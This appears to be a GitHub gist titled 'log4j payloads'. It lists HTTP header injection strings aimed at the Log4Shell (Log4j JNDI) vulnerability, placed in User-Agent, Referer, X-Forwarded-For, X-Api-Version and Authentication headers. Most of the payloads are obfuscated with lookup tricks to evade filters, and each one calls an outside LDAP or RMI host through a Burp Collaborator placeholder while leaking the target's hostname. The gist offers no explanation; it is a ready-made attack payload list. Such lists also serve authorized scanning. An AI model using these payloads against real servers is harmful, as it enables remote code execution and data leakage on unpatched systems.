Skip to content

Instantly share code, notes, and snippets.

@incogbyte

incogbyte/log4j.txt

Created February 4, 2022 19:22
Show Gist options
  • Save incogbyte/f9342586f2c39ee88391254e93f88c74 to your computer and use it in GitHub Desktop.
Save incogbyte/f9342586f2c39ee88391254e93f88c74 to your computer and use it in GitHub Desktop.
Download ZIP
log4j payloads
Raw
log4j.txt
User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
Authentication: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
User-Agent: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
X-Api-Version: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
Referer: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
X-Forwarded-For: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
Authentication: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
X-Api-Version: ${jndi:ldap://${hostName}.{{burp}}/badClassName}
Referer: ${jndi:ldap://${hostName}.{{burp}}/badClassName}
X-Forwarded-For: ${jndi:ldap://${hostName}.{{burp}}/badClassName}
Authentication: ${jndi:ldap://${hostName}.{{burp}}/badClassName}
User-Agent: ${jndi:ldap://${hostName}.{{burp}}/badClassName}
Authentication: ${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}:${hostName}.{{burp}}/s2edwin}
User-Agent: ${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}:${hostName}.{{burp}}/s2edwin}
X-Api-Version: ${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}:${hostName}.{{burp}}/s2edwin}
Referer: ${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}:${hostName}.{{burp}}/s2edwin}
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}:${hostName}.{{burp}}/s2edwin}
User-Agent: ${${::-j}ndi:rmi://${hostName}.{{burp}}/ass}
X-Api-Version: ${${::-j}ndi:rmi://${hostName}.{{burp}}/ass}
Referer: ${${::-j}ndi:rmi://${hostName}.{{burp}}/ass}
X-Forwarded-For: ${${::-j}ndi:rmi://${hostName}.{{burp}}/ass}
Authentication: ${${::-j}ndi:rmi://${hostName}.{{burp}}/ass}
User-Agent: ${jndi:rmi://${hostName}.{{burp}}}
X-Api-Version: ${jndi:rmi://${hostName}.{{burp}}}
Referer: ${jndi:rmi://${hostName}.{{burp}}}
X-Forwarded-For: ${jndi:rmi://${hostName}.{{burp}}}
Authentication: ${jndi:rmi://${hostName}.{{burp}}}
User-Agent: ${${lower:jndi}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
X-Api-Version: ${${lower:jndi}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
Referer: ${${lower:jndi}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
X-Forwarded-For: ${${lower:jndi}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
Authentication: ${${lower:jndi}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
User-Agent: ${${lower:${lower:jndi}}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
X-Api-Version: ${${lower:${lower:jndi}}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
Referer: ${${lower:${lower:jndi}}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
X-Forwarded-For: ${${lower:${lower:jndi}}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
Authentication: ${${lower:${lower:jndi}}:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
Referer: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
X-Forwarded-For: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
Authentication: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
User-Agent: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{burp}}/s2edwin}
X-Api-Version: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{burp}}/s2edwin
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment